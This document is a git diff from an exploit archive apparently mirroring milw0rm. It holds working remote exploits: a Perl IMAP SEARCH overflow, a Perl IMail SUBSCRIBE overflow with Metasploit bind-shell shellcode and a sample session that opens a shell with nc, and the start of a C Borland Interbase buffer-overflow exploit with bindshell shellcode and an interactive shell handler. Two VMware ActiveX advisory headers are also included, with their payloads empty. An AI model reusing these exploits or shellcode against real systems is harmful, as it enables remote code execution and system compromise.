+"\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x8d\x2c\xdc\x5d".
+"\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\xe9\x64\xf9\x9e".
+"\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x3d\x3b\xc8\xfe".
+"\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\xf8\x76\x14\x25".
+"\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\xe9\x2c\x07\xa5".
+"\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x37\x95\xf0\x77".
+"\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x60\x2b\xab\x26".
+"\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\xd0\x2b\x71\x94".
+"\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\xe3\x87\x28\x1d".
+"\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x53\x31\x7e\x3c".
+"\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\xcf\xbe\x81\x22".
+"\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x3f\x9d\x92\x25".
+"\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x1c\x86\xba\x58".
+"\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x48\xcb\xee\x8a".
+"\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\xe7\x29\xad\x24".
+"\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x49\x4f\x07\xa5".
+"\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x59\xb6\x18\x15".
+"\xe5\x87\x2e\x8a\x66\x78\xf8\x75";
+
+
+my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.\n";
+
+my $res = <$sock>;
+print $res;
+if( $res !~ /OK/ )
+{
+	exit(-1);
+}
+
+# login
+print $sock "0 LOGIN $account $password\r\n";
+print $res = <$sock>;
+if( $res !~ /0 OK/ )
+{
+	exit(-1);
+}
+
+# select
+print $sock "1 SELECT INBOX\r\n";
+while(1)
+{
+	print $res = <$sock>;
+	if($res =~ /1 OK/)
+	{	last; }
+	elsif($res =~ /1 NO/ || $res =~ /BAD/)
+	{ 	exit(-1); }
+	else
+	{	next; }
+}
+
+# search
+my $payload = $pad1.$jmpesp.$pad2.$shellcode;
+print $sock "2 SEARCH ON <$payload>\r\n";
+
+$sock->close();
+
+# milw0rm.com [2007-07-25]
diff --git a/platforms/windows/remote/4228.pl b/platforms/windows/remote/4228.pl
index d62198bd5..13fe463cd 100755
--- a/platforms/windows/remote/4228.pl
+++ b/platforms/windows/remote/4228.pl
@@ -1,147 +1,147 @@
-#!/use/bin/perl
-
-# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
-# Code by yunshu, our team: www.ph4nt0m.org  Mail list: http://list.ph4nt0m.org
-
-#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
-#* OK IMAP4 Server (IMail 9.10)
-#0 OK LOGIN completed
-#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
-#* 0 EXISTS
-#* 0 RECENT
-#* OK [UIDVALIDITY 1185270594] UIDs valid
-#* OK [UIDNEXT 485270595] Predicted next UID
-#2 OK [READ-WRITE] SELECT completed
-#3 OK SUBSCRIBE completed
-#Trying..
-#Bingle!Maybe get it!
-#You can try to telnet 22 port, do you have nc?
-
-
-#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
-#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
-#(UNKNOWN) [192.168.1.2] 22 (?) open
-#Microsoft Windows [.. 5.2.3790]
-#(C) .... 1985-2003 Microsoft Corp.
-
-#C:\WINDOWS\system32>net user
-#net user
-
-#\\ .....
-
-#-------------------------------------------------------------------------------
-#Administrator            ASPNET                   Guest
-#IUSR_WIN2K3              IWAM_WIN2K3              SUPPORT_388945a0
-#..................
-
-
-#C:\WINDOWS\system32>
-
-
-use strict;
-use warnings;
-use IO::Socket;
-
-if( @ARGV != 3 )
-{
-	my $banner = qq{
-Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1
-You must have a account to login the imap server, good luck!
-Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~
-					 
-imail_subscribe.pl        
-};
-
-	print $banner."\n";
-	
-	exit( -1 );
-}
-
-my $host = $ARGV[0];
-my $user = $ARGV[1];
-my $pass = $ARGV[2];
-
-# win32_bind -  EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com
-my $shellcode =
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x41".
-"\xd1\xfd\xbc\x83\xeb\xfc\xe2\xf4\xbd\xbb\x16\xf1\xa9\x28\x02\x43".
-"\xbe\xb1\x76\xd0\x65\xf5\x76\xf9\x7d\x5a\x81\xb9\x39\xd0\x12\x37".
-"\x0e\xc9\x76\xe3\x61\xd0\x16\xf5\xca\xe5\x76\xbd\xaf\xe0\x3d\x25".
-"\xed\x55\x3d\xc8\x46\x10\x37\xb1\x40\x13\x16\x48\x7a\x85\xd9\x94".
-"\x34\x34\x76\xe3\x65\xd0\x16\xda\xca\xdd\xb6\x37\x1e\xcd\xfc\x57".
-"\x42\xfd\x76\x35\x2d\xf5\xe1\xdd\x82\xe0\x26\xd8\xca\x92\xcd\x37".
-"\x01\xdd\x76\xcc\x5d\x7c\x76\xfc\x49\x8f\x95\x32\x0f\xdf\x11\xec".
-"\xbe\x07\x9b\xef\x27\xb9\xce\x8e\x29\xa6\x8e\x8e\x1e\x85\x02\x6c".
-"\x29\x1a\x10\x40\x7a\x81\x02\x6a\x1e\x58\x18\xda\xc0\x3c\xf5\xbe".
-"\x14\xbb\xff\x43\x91\xb9\x24\xb5\xb4\x7c\xaa\x43\x97\x82\xae\xef".
-"\x12\x82\xbe\xef\x02\x82\x02\x6c\x27\xb9\xfd\xaa\x27\x82\x74\x5d".
-"\xd4\xb9\x59\xa6\x31\x16\xaa\x43\x97\xbb\xed\xed\x14\x2e\x2d\xd4".
-"\xe5\x7c\xd3\x55\x16\x2e\x2b\xef\x14\x2e\x2d\xd4\xa4\x98\x7b\xf5".
-"\x16\x2e\x2b\xec\x15\x85\xa8\x43\x91\x42\x95\x5b\x38\x17\x84\xeb".
-"\xbe\x07\xa8\x43\x91\xb7\x97\xd8\x27\xb9\x9e\xd1\xc8\x34\x97\xec".
-"\x18\xf8\x31\x35\xa6\xbb\xb9\x35\xa3\xe0\x3d\x4f\xeb\x2f\xbf\x91".
-"\xbf\x93\xd1\x2f\xcc\xab\xc5\x17\xea\x7a\x95\xce\xbf\x62\xeb\x43".
-"\x34\x95\x02\x6a\x1a\x86\xaf\xed\x10\x80\x97\xbd\x10\x80\xa8\xed".
-"\xbe\x01\x95\x11\x98\xd4\x33\xef\xbe\x07\x97\x43\xbe\xe6\x02\x6c".
-"\xca\x86\x01\x3f\x85\xb5\x02\x6a\x13\x2e\x2d\xd4\xae\x1f\x1d\xdc".
-"\x12\x2e\x2b\x43\x91\xd1\xfd\xbc";
-
-my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.\n";
-
-my $res = <$sock>;
-print $res;
-if( $res !~ /OK/ )
-{
-	exit( -1 );
-}
-
-my $opcode = "\x60\x1A\x9C\x76";
-#my $opcode = "\x61\x62\x63\x64";
-
-my $num = 264991;
-
-my $nop = "#IMAILPUB" . "\x90" x ( $num - length($shellcode) ).$shellcode."\x90\x90\xeb\x06".$opcode."\x90\x90\x90\x90"."\xE9\x44\xfd\xff\xff"."\x90" x 400;
-
-# login
-print $sock "0 LOGIN $user $pass\r\n";
-$res = <$sock>;
-if( ! defined($res) )
-{
-	exit(-1);
-}
-
-print $res;
-if( $res !~ /OK/ )
-{
-	exit(-1);
-}
-
-print $sock "2 SELECT INBOX\r\n";
-while( <$sock> )
-{
-	print $_;
-	if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ )
-	{
-		last;
-	}
-}
-
-print $sock "3 SUBSCRIBE \"$nop\"\r\n";
-$res = <$sock>;
-if( ! defined($res) )
-{
-	exit(-1);
-}
-print $res;
-
-print "Trying..\n";
-
-sleep( 15 );
-print "Bingle! Maybe get it!\nYou can try to telnet 22 port, do you have nc?\n";
-
-print $sock "4 LOGOUT\r\n";
-print <$sock>;
-
-$sock->close();
-
-# milw0rm.com [2007-07-26]
+#!/use/bin/perl
+
+# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
+# Code by yunshu, our team: www.ph4nt0m.org  Mail list: http://list.ph4nt0m.org
+
+#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
+#* OK IMAP4 Server (IMail 9.10)
+#0 OK LOGIN completed
+#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
+#* 0 EXISTS
+#* 0 RECENT
+#* OK [UIDVALIDITY 1185270594] UIDs valid
+#* OK [UIDNEXT 485270595] Predicted next UID
+#2 OK [READ-WRITE] SELECT completed
+#3 OK SUBSCRIBE completed
+#Trying..
+#Bingle!Maybe get it!
+#You can try to telnet 22 port, do you have nc?
+
+
+#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
+#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
+#(UNKNOWN) [192.168.1.2] 22 (?) open
+#Microsoft Windows [.. 5.2.3790]
+#(C) .... 1985-2003 Microsoft Corp.
+
+#C:\WINDOWS\system32>net user
+#net user
+
+#\\ .....
+
+#-------------------------------------------------------------------------------
+#Administrator            ASPNET                   Guest
+#IUSR_WIN2K3              IWAM_WIN2K3              SUPPORT_388945a0
+#..................
+
+
+#C:\WINDOWS\system32>
+
+
+use strict;
+use warnings;
+use IO::Socket;
+
+if( @ARGV != 3 )
+{
+	my $banner = qq{
+Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1
+You must have a account to login the imap server, good luck!
+Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~
+					 
+imail_subscribe.pl        
+};
+
+	print $banner."\n";
+	
+	exit( -1 );
+}
+
+my $host = $ARGV[0];
+my $user = $ARGV[1];
+my $pass = $ARGV[2];
+
+# win32_bind -  EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com
+my $shellcode =
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x41".
+"\xd1\xfd\xbc\x83\xeb\xfc\xe2\xf4\xbd\xbb\x16\xf1\xa9\x28\x02\x43".
+"\xbe\xb1\x76\xd0\x65\xf5\x76\xf9\x7d\x5a\x81\xb9\x39\xd0\x12\x37".
+"\x0e\xc9\x76\xe3\x61\xd0\x16\xf5\xca\xe5\x76\xbd\xaf\xe0\x3d\x25".
+"\xed\x55\x3d\xc8\x46\x10\x37\xb1\x40\x13\x16\x48\x7a\x85\xd9\x94".
+"\x34\x34\x76\xe3\x65\xd0\x16\xda\xca\xdd\xb6\x37\x1e\xcd\xfc\x57".
+"\x42\xfd\x76\x35\x2d\xf5\xe1\xdd\x82\xe0\x26\xd8\xca\x92\xcd\x37".
+"\x01\xdd\x76\xcc\x5d\x7c\x76\xfc\x49\x8f\x95\x32\x0f\xdf\x11\xec".
+"\xbe\x07\x9b\xef\x27\xb9\xce\x8e\x29\xa6\x8e\x8e\x1e\x85\x02\x6c".
+"\x29\x1a\x10\x40\x7a\x81\x02\x6a\x1e\x58\x18\xda\xc0\x3c\xf5\xbe".
+"\x14\xbb\xff\x43\x91\xb9\x24\xb5\xb4\x7c\xaa\x43\x97\x82\xae\xef".
+"\x12\x82\xbe\xef\x02\x82\x02\x6c\x27\xb9\xfd\xaa\x27\x82\x74\x5d".
+"\xd4\xb9\x59\xa6\x31\x16\xaa\x43\x97\xbb\xed\xed\x14\x2e\x2d\xd4".
+"\xe5\x7c\xd3\x55\x16\x2e\x2b\xef\x14\x2e\x2d\xd4\xa4\x98\x7b\xf5".
+"\x16\x2e\x2b\xec\x15\x85\xa8\x43\x91\x42\x95\x5b\x38\x17\x84\xeb".
+"\xbe\x07\xa8\x43\x91\xb7\x97\xd8\x27\xb9\x9e\xd1\xc8\x34\x97\xec".
+"\x18\xf8\x31\x35\xa6\xbb\xb9\x35\xa3\xe0\x3d\x4f\xeb\x2f\xbf\x91".
+"\xbf\x93\xd1\x2f\xcc\xab\xc5\x17\xea\x7a\x95\xce\xbf\x62\xeb\x43".
+"\x34\x95\x02\x6a\x1a\x86\xaf\xed\x10\x80\x97\xbd\x10\x80\xa8\xed".
+"\xbe\x01\x95\x11\x98\xd4\x33\xef\xbe\x07\x97\x43\xbe\xe6\x02\x6c".
+"\xca\x86\x01\x3f\x85\xb5\x02\x6a\x13\x2e\x2d\xd4\xae\x1f\x1d\xdc".
+"\x12\x2e\x2b\x43\x91\xd1\xfd\xbc";
+
+my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.\n";
+
+my $res = <$sock>;
+print $res;
+if( $res !~ /OK/ )
+{
+	exit( -1 );
+}
+
+my $opcode = "\x60\x1A\x9C\x76";
+#my $opcode = "\x61\x62\x63\x64";
+
+my $num = 264991;
+
+my $nop = "#IMAILPUB" . "\x90" x ( $num - length($shellcode) ).$shellcode."\x90\x90\xeb\x06".$opcode."\x90\x90\x90\x90"."\xE9\x44\xfd\xff\xff"."\x90" x 400;
+
+# login
+print $sock "0 LOGIN $user $pass\r\n";
+$res = <$sock>;
+if( ! defined($res) )
+{
+	exit(-1);
+}
+
+print $res;
+if( $res !~ /OK/ )
+{
+	exit(-1);
+}
+
+print $sock "2 SELECT INBOX\r\n";
+while( <$sock> )
+{
+	print $_;
+	if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ )
+	{
+		last;
+	}
+}
+
+print $sock "3 SUBSCRIBE \"$nop\"\r\n";
+$res = <$sock>;
+if( ! defined($res) )
+{
+	exit(-1);
+}
+print $res;
+
+print "Trying..\n";
+
+sleep( 15 );
+print "Bingle! Maybe get it!\nYou can try to telnet 22 port, do you have nc?\n";
+
+print $sock "4 LOGOUT\r\n";
+print <$sock>;
+
+$sock->close();
+
+# milw0rm.com [2007-07-26]
diff --git a/platforms/windows/remote/4230.html b/platforms/windows/remote/4230.html
index 55916cf7c..29dea99e9 100755
--- a/platforms/windows/remote/4230.html
+++ b/platforms/windows/remote/4230.html
@@ -1,17 +1,17 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-07-26]
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-07-26]
diff --git a/platforms/windows/remote/4237.html b/platforms/windows/remote/4237.html
index c980d38fd..258513a98 100755
--- a/platforms/windows/remote/4237.html
+++ b/platforms/windows/remote/4237.html
@@ -1,17 +1,17 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-07-27]
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-07-27]
diff --git a/platforms/windows/remote/4240.html b/platforms/windows/remote/4240.html
index bbb4723f4..bee9cfacf 100755
--- a/platforms/windows/remote/4240.html
+++ b/platforms/windows/remote/4240.html
@@ -1,84 +1,84 @@
-
-
-
-
- 
-
-
-
-
-
-
-# milw0rm.com [2007-07-28]
+
+
+
+
+ 
+
+
+
+
+
+
+# milw0rm.com [2007-07-28]
diff --git a/platforms/windows/remote/4244.html b/platforms/windows/remote/4244.html
index 61b37db4c..c648fcff6 100755
--- a/platforms/windows/remote/4244.html
+++ b/platforms/windows/remote/4244.html
@@ -1,78 +1,78 @@
-:. GOODFELLAS Security Research TEAM  .:
-:. http://goodfellas.shellcode.com.ar .:
-
-vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit
-=============================================================================
-
-Internal ID: VULWAR200707290.
------------
-
-Introduction
-------------
-vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.
-
-
-Tested In
----------
-- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
-
-
-Summary
--------
-The StartProcess method doesn't check if it's being called from the application,
-or malicious users. Remote Attacker could craft a html page and execute code in
-a remote system with the actual user privileges.
-
-
-Impact
-------
-Any computer that uses this Sofware will be exposed to Remote Execution Code.
-
-
-Workaround
-----------
-- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529
-- Unregister vielib.dll using regsvr32.
-
-
-Timeline
---------
-July 29 2007 -- Bug Discovery.
-July 29 2007 -- Exploit published.
-
-
-Credits
--------
- * callAX 
- * GoodFellas Security Research Team  
- 
-
-Technical Details
------------------
-
-StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit
-is using three standard files that exists in every Microsoft Office 2003 Application.
-
-
-
-
-  
-
-
-
-
-
-# milw0rm.com [2007-07-29]
+:. GOODFELLAS Security Research TEAM  .:
+:. http://goodfellas.shellcode.com.ar .:
+
+vielib.dll 2.2.5.42958 VmWare Inc version 6.0.0 Remode Code Execution Exploit
+=============================================================================
+
+Internal ID: VULWAR200707290.
+-----------
+
+Introduction
+------------
+vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.
+
+
+Tested In
+---------
+- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
+
+
+Summary
+-------
+The StartProcess method doesn't check if it's being called from the application,
+or malicious users. Remote Attacker could craft a html page and execute code in
+a remote system with the actual user privileges.
+
+
+Impact
+------
+Any computer that uses this Sofware will be exposed to Remote Execution Code.
+
+
+Workaround
+----------
+- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529
+- Unregister vielib.dll using regsvr32.
+
+
+Timeline
+--------
+July 29 2007 -- Bug Discovery.
+July 29 2007 -- Exploit published.
+
+
+Credits
+-------
+ * callAX 
+ * GoodFellas Security Research Team  
+ 
+
+Technical Details
+-----------------
+
+StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit
+is using three standard files that exists in every Microsoft Office 2003 Application.
+
+
+
+
+  
+
+
+
+
+
+# milw0rm.com [2007-07-29]
diff --git a/platforms/windows/remote/4245.html b/platforms/windows/remote/4245.html
index c7624d7b8..9f7bdbf80 100755
--- a/platforms/windows/remote/4245.html
+++ b/platforms/windows/remote/4245.html
@@ -1,74 +1,74 @@
-:. GOODFELLAS Security Research TEAM  .:
-:. http://goodfellas.shellcode.com.ar .:
-
-VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remode Code Execution Exploit
-======================================================================================
-
-Internal ID: VULWAR200707300.
------------
-
-Introduction
-------------
-vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.
-
-
-Tested In
----------
-- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
-
-
-Summary
--------
-The CreateProcess & CreateProcessEx method doesn't check if they're being called
-from the application, or malicious users. Remote Attacker could craft a html page
-and execute code in a remote system with the actual user privileges.
-
-
-Impact
-------
-Any computer that uses this Sofware will be exposed to Remote Execution Code.
-
-
-Workaround
-----------
-- Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A
-- Unregister vielib.dll using regsvr32.
-
-
-Timeline
---------
-July 30 2007 -- Bug Discovery.
-July 30 2007 -- Exploit published.
-
-
-Credits
--------
- * callAX 
- * GoodFellas Security Research Team  
- 
-
-Technical Details
------------------
-
-
-
-
-  
-
-
-
-
-
-# milw0rm.com [2007-07-30]
+:. GOODFELLAS Security Research TEAM  .:
+:. http://goodfellas.shellcode.com.ar .:
+
+VmWare Inc version 6.0.0 CreateProcess & CreateProcessEx Remode Code Execution Exploit
+======================================================================================
+
+Internal ID: VULWAR200707300.
+-----------
+
+Introduction
+------------
+vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.
+
+
+Tested In
+---------
+- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
+
+
+Summary
+-------
+The CreateProcess & CreateProcessEx method doesn't check if they're being called
+from the application, or malicious users. Remote Attacker could craft a html page
+and execute code in a remote system with the actual user privileges.
+
+
+Impact
+------
+Any computer that uses this Sofware will be exposed to Remote Execution Code.
+
+
+Workaround
+----------
+- Activate the Kill bit zero in clsid:0F748FDE-0597-443C-8596-71854C5EA20A
+- Unregister vielib.dll using regsvr32.
+
+
+Timeline
+--------
+July 30 2007 -- Bug Discovery.
+July 30 2007 -- Exploit published.
+
+
+Credits
+-------
+ * callAX 
+ * GoodFellas Security Research Team  
+ 
+
+Technical Details
+-----------------
+
+
+
+
+  
+
+
+
+
+
+# milw0rm.com [2007-07-30]
diff --git a/platforms/windows/remote/4247.c b/platforms/windows/remote/4247.c
index 84bd299bb..109772ea8 100755
--- a/platforms/windows/remote/4247.c
+++ b/platforms/windows/remote/4247.c
@@ -1,343 +1,343 @@
-/*
-
-	http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html
-
-	Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P
-	All your base are belong to FD2K2!
-
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib,"ws2_32")
-
-#define IB_PORT "3050"
-// 0xFF - 0x8, jmp 8 bytes back
-#define JMP "\x90\x90\xEB\xF7"
-// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode
-CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF";
-// BIG_JMP SIZE
-#define BIG_JMP_SIZE 5
-
-CHAR ASCII_SHIT[]=
-"\r\n                   >__            _      ___\r\n"
-"                  / __\\26/07/2007| | __ / __\\ ___  _ __   ___ \r\n"
-"                 /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n"
-"                / \\/  \\ (_| | (__|   \r\n"
-"                     _______________BackBone_(c)_2007_______\r\n\r\n";
-
-struct
-{
-	char* cVersion;
-	DWORD dwRet;
-	DWORD dwLength1;
-	DWORD dwLength2;
-}
-targets[]=
-{
-	{"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123
-	{"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129
-	{"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181
-	{"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6
- },v;
-
-// don't change the offset
-#define PORT_OFFSET 170
-#define BIND_PORT 10282
-
-// bindshell shellcode from www.metasploit.com,mod by skylined
-unsigned char shellcode[] =
-  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
-  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
-  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
-  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
-  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
-  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
-  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
-  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
-  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
-  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
-  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
-  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
-  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
-  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
-  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
-  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
-  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
-  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
-  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
-  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
-  "\x83\xc4\x5c\x61\xeb\x89";
-
-#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);
-
-unsigned long lookupaddress(const char* pchost)
-{
-	unsigned long nremoteaddr = inet_addr(pchost);
-
-	if (nremoteaddr == INADDR_NONE)
-	{
-		struct hostent* phe = gethostbyname(pchost);
-
-		if (phe == 0)
-			return INADDR_NONE;
-		nremoteaddr = *((u_long*)phe->h_addr_list[0]);
-	}
-	return nremoteaddr;
-}
-
-void showusage(char* argv)
-{
-	int i;
-
-	printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv);
-	printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT);
-	printf("[*] Targets:\r\n\r\n");
-	for (i=0;i<(sizeof(targets)/sizeof(v));i++)
-		printf("\t%2d: %s\r\n",i,targets[i].cVersion);
-}
-
-void showinfo(void)
-{
-	printf("%s",ASCII_SHIT);
-	printf("    Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n");
-	printf("                       Advisory provided by TPTI-07-13.\r\n");
-	printf("                            Exploit by BackBone.\r\n\r\n");
-}
-
-/* ripped from TESO code and modifed by ey4s for win32 */
-void shell (int sock)
-{
-	int l;
-	char buf[512];
-	struct    timeval time;
-	unsigned long    ul[2];
-
-	time.tv_sec = 1;
-	time.tv_usec = 0;
-
-	while(1)
-	{
-		ul[0]=1;
-		ul[1]=sock;
-
-		l=select(0,(fd_set*)&ul,NULL,NULL,&time);
-		if(l==1)
-		{
-			l=recv(sock,buf,sizeof(buf),0);
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-			l=write(1,buf,l);
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-		}
-		else
-		    {
-			l=read(0,buf,sizeof(buf));
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-			l=send(sock,buf,l,0);
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-		}
-	}
-}
-
-int main(int argc, char *argv[])
-{
-	char *host,*port;
-	unsigned long ulip;
-	WSADATA wsa;
-	SOCKET s;
-	struct sockaddr_in sock_in;
-	char buffer[16384];
-	int bind,type;
-	unsigned int size=0;
-	DWORD dwLen1,dwLen2;
-	DWORD dwBigJmp=0xFFFFFFFF;
-	int i;
-
-	showinfo();
-
-	if (argc<3 || argc>4)
-	{
-		showusage(argv[0]);
-		return -1;
-	}
-
-	host=strtok(argv[1],":");
-	if((port=strtok(NULL,":"))==0)
-		port=IB_PORT;
-
-	if (WSAStartup(MAKEWORD(1,0),&wsa)!=0)
-	{
-		printf("[-] WSAStartup() error.\r\n");
-		return -1;
-	}
-
-	ulip=lookupaddress(host);
-	if (ulip==INADDR_ANY || ulip==INADDR_NONE)
-	{
-		printf("[-] invalid ip or host.\r\n");
-		return -1;
-	}
-
-	if (atoi(port)<0 || atoi(port)>65534)
-	{
-		printf("[-] invalid port.\r\n");
-		return -1;
-	}
-
-	type=atoi(argv[2]);
-	if (type>(sizeof(targets)/sizeof(v))-1 || type<0)
-	{
-		printf("[-] invalid target type.\r\n");
-		return -1;
-	}
-
-	printf("[+] Target: %s\r\n",targets[type].cVersion);
-
-	bind=BIND_PORT;
-	if (argc==4)
-	{
-		if (atoi(argv[3])>0 && atoi(argv[3])<65535)
-			bind=atoi(argv[3]);
-	}
-	SET_BIND_PORT(bind);
-
-	s=socket(AF_INET, SOCK_STREAM,0);
-	if (s==INVALID_SOCKET)
-	{
-		printf("[-] socket() error.\r\n",s);
-		return -1;
-	}
-
-	sock_in.sin_port=htons((u_short)atoi(port));
-	sock_in.sin_family=AF_INET;
-	sock_in.sin_addr.s_addr=ulip;
-
-	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,
-		(ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port));
-
-	if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)
-	{
-		printf("Failed!\r\n");
-		closesocket(s);
-		WSACleanup();
